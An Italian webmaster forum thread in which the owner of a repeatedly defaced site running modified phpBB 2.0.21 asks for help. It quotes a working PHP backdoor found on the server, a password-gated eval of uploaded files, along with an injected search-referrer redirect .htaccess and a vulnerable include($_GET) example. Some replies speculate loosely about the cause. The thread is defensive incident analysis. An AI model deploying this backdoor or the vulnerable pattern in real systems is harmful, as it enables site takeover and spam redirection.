• User Attivo

    la tecnologia è php, hanno modificato l'htaccess della root (e questo mi fa tremare le gambe) inserendo un htaccess fasullo a vista (che inrealtà dovrebbe essere nascosto) ed inserito due cartelle in una cartella interna


  • User

    io li chiamerei cracker piu che lamer 🙂


  • User Attivo

    Tipicamente quali vulnerabilità vengono sfruttate per questo tipo di crack?
    Ho controllato tutto e non riesco a trovare la vulnerabilità che ogni giorno sfruttano!


  • User Attivo

    Tante. Spesso sono attacchi basati su php, sql-injection. Quasi mai sono attacchi a livello demone ( Apache, IIS...) e molto piu facili da implementare rispetto a quest'ultimi.


  • User Attivo

    Non è sql-injection poiché il db è integro. Hano creato molti file php e modificato htaccess. Cosa potrei controllare? Ho un modulo che consente l'upload di immagini, ho bloccato tutti i file non jpg..


  • Bannato User

    nedone se ti va posso dare un occhiata io...
    comunque se uno usa una sql injection non centra se il db e' integro...hanno solo attaccato tramite sql injection e hanno recuperato la tua password criptata in MD5 ...l'hanno crackata e spesso e' uguale a quella dell'FTP...se l'admin e' ingenuo...
    Oppure un altro tipo di attacco che secondo me al 99% hanno usato e' il remote file inclusion...ovvero sfruttando un include(); hanno preso controllo del tuo sito creando file e backdoor a loro piacere...
    Contattami in pvt se ti va di "ingaggiarmi"...potrei trovare e fixare il bug.
    O se vuoi fare da te,controlla tutte le variabili che $_GET non sia tramite include..
    Esempio:

    $variabile = $_GET['variabile'];
    include($variabile);

    Vedi tu...


  • User Attivo

    Ti ho mandato un messaggio in pvt. Cmq le password sono molto diverse. Sul sito è installata una versione molto modificata di phpbb, sarebbe ostico effettuare un controllo di tutte le variabili...


  • Bannato User

    ricevuto 😉


  • Consiglio Direttivo

    Ciao nedone,

    @nedone said:

    ....Sul sito è installata una versione molto modificata di phpbb.....

    versione di phpbb?


  • User Attivo

    Non saprei, anche perché l'ho modificata pesantemente, cmq dovrebbe essere la 2.0.21


  • Consiglio Direttivo

    @nedone said:

    ....dovrebbe essere la 2.0.21

    Un po' vecchiotta, nedone! 😉


  • User Attivo

    Lo so, ma ormai con tutte le modifiche che ho apportato è inaggiornabile...


  • Bannato User

    massi' tanto la 2.0.21 ha solo un Cross site scripting in privmsg.php e un altro Cross site request forgery...roba da "nulla"...
    al massimo cambia quel file con quello della 2.0.23...e potresti cambiare anche gli altri,stando attento a non eliminare le tue modifiche...
    nedone correggi quell'include che ti ho fatto vedere e in teoria sei a posto...


  • User Attivo

    Quello che mi hai fatto vedere non è una include! In pratica non ne uso di include!
    Stamani al solito ho ritrovato il deface in atto. Sono alla disperazione! Cosa posso fare? Secondo voi hanno il controllo dell'ftp? Cambio la pwd?


  • Consiglio Direttivo

    @nedone said:

    Stamani al solito ho ritrovato il deface in atto. Sono alla disperazione! Cosa posso fare?

    Ciao nedone,

    posta pure l'indirizzo del tuo sito, "magari in pvt"! 🙂

    @nedone said:

    Cambio la pwd?

    😉


  • User Attivo

    il sito è delmutolo.com


  • User Attivo

    Potete aiutarmi a capire l'intento di questo script che ho trovato occultato nelle mie cartelle?

    
    <?php
        error_reporting(1);
        global $HTTP_SERVER_VARS; 
        function say($t) { 
            echo "$t\n"; 
        };
        function testdata($t) {
            say(md5("testdata_$t"));
        };
        echo "<pre>";
        testdata('start');
        if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
            if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"])){
                eval($code);
            }
            else{
                testdata('f');
            };
        }
        else{ 
            testdata('pass');
        };
        testdata('end');
        echo "</pre>";
    ?>
    
    ```Credo di aver capito cosa fa, ma non riesco a capire il perché lo fa.
    Mi rimane oscura la comprensione del funzionamento che c'è alle spalle.
    
    A questo va associato il file .htaccess che viene modificato così:
    
    

    RewriteEngine on

    a0b4df006e02184c60dbf503e71c87ad

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http:([a-z0-9_-]+.)(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24).
    RewriteCond %{HTTP_REFERER}?&=
    RewriteCond %{HTTP_REFERER} =[^&]+(%3A|%22)
    RewriteCond %{TIME_SEC} <59
    RewriteRule ^.
    $ /images/ekukure/ex3/t.htm

    a995d2cc661fa72452472e9554b5520c

    RewriteRule foto-(.*).html gallery.php?dir=$1


  • Bannato User

    il primo codice e' una backdoor... si intravede che chiede una password per amministrarla e fare del tuo ftp cio' che vogliono....si intravede inoltre fopen(); Puo essere che il cracker richiami quella pagina,che richiede una password...se la password e' giusta,crea un file/backdoor e accede al tuo ftp...mettendo altre backdoor...


  • User Attivo

    Puoi provare a spiegarmi meglio quello che hai detto? Io ho provato ad usare questo script come destinatario di una post, ho inviato un file tramite un modulo, ma non sono arrivato molto oltre.


  • Bannato User

    Molto spesso i cracker hanno bisogno un bug di tipo Remote File Inclusion per violare un sito web vulnerabile,e quindi prendere il controllo di tutti i file presenti in esso.

    Tramite questo bug,si possono caricare nell ftp delle shell,le piu famose sono c99 e r57 ...sono degli script php che autorizzano il lancio di qualsiasi comando nel server,quindi modificare,creare,chmoddare,eliminare files.
    Quando il file di configurazione non e' criptato,si puo risalire all'intero database per un eventuale cracking delle password.
    Inoltre, tramite queste shell,si puo avere una shell sul proprio pc che permette di diventare root,qualora i demoni o il kernel fosse vulnerabile...
    cio' vuol dire che se in un server,ci sono 2mila siti web e io sono root...immagina che bel casino che potrei combinare...

    Quei file mi sono nuovi , ma lo chiamerei ".htaccess hacking" ...
    il primo script richiede una password e apre un file...non posso capire oltre...
    il secondo e' un htaccess che si basa sui referrer e quindi quando qualcuno arriva nel tuo sito viene dirottato sulle keywords che sono indicate in esso...
    Mi sta venendo un dubbio...

    Hai phpbb vecchio e completamente modificato no?
    che qualcuno abbia caricato una shell come fosse un avatar dal nome avatar.php.jpg ????
    che mi ricordo ,phpbb aveva questo tipo di bug...
    elimina tutti gli avatar e disabilita il caricamento...
    dopodiche' cancella tutti i file sospetti che sai che non sono tuoi...dopo averli controllati ovviamente...

    Fammi sapere 🙂